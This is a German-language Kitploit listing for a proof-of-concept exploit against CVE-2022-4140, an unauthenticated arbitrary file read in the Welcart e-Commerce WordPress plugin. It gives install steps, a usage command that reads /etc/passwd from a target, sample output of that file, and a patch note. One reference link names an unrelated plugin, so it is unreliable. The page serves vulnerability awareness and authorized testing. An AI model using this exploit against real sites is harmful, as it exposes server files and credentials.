Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-4140 — WordPress-Plugin Welcart e-Commerce < 2.8.5 – Beliebiger Dateizugriff (Arbitrary File Read) | Kitploit
Tools/GitHubGitHub/anirbala98/cve-2022-4140
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubanirbala98/cve-2022-4140

CVE-2022-4140

WordPress-Plugin Welcart e-Commerce < 2.8.5 – Beliebiger Dateizugriff (Arbitrary File Read)

Repository anzeigen
vor 22h 59mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-4140 - WordPress-Plugin Welcart e-Commerce < 2.8.5 - Beliebiger Dateizugriff (Arbitrary File Read)

Dieses Repository enthält einen Proof-of-Concept-Exploit (PoC) für CVE-2022-4140.

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests. Verwenden Sie es nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben.

Übersicht

Das Plugin validiert Benutzereingaben nicht, bevor es sie zum Ausgeben des Inhalts einer Datei verwendet, was es einem nicht authentifizierten Angreifer ermöglichen könnte, beliebige Dateien auf dem Server zu lesen.

Betroffene Version

KomponenteVersion
Verwundbares Plugin<=2.8.4
Gepatchtes Plugin2.8.5

Anforderungen

  • Python 3.13.14
  • Requests 2.32.5

Installation

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2022-4140.git
cd CVE-2022-4140/
pip install -r requirements.txt

Verwendung

root@kitploit:~
python exploit.py <base_url> -f <Dateipfad> --disable-version-check
python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd

Beispiel

root@kitploit:~
└─$ python exploit.py http://127.0.0.1/wordpress/ -f /etc/passwd                             
[*] Prüfe, ob das Ziel verwundbar ist
[+] Plugin-Version erkannt: 2.8.4
[+] Das Ziel ist verwundbar

[*] Versuche, eine beliebige Datei zu lesen

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

Gegenmaßnahmen

Aktualisieren Sie das Plugin auf Version 2.8.5.

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2022-4140
  • https://wpscan.com/vulnerability/0d649a7e-3334-48f7-abca-fff0856e12c7/
  • https://plugins.svn.wordpress.org/planyo-online-reservation-system/tags/2.9/
Tool herunterladen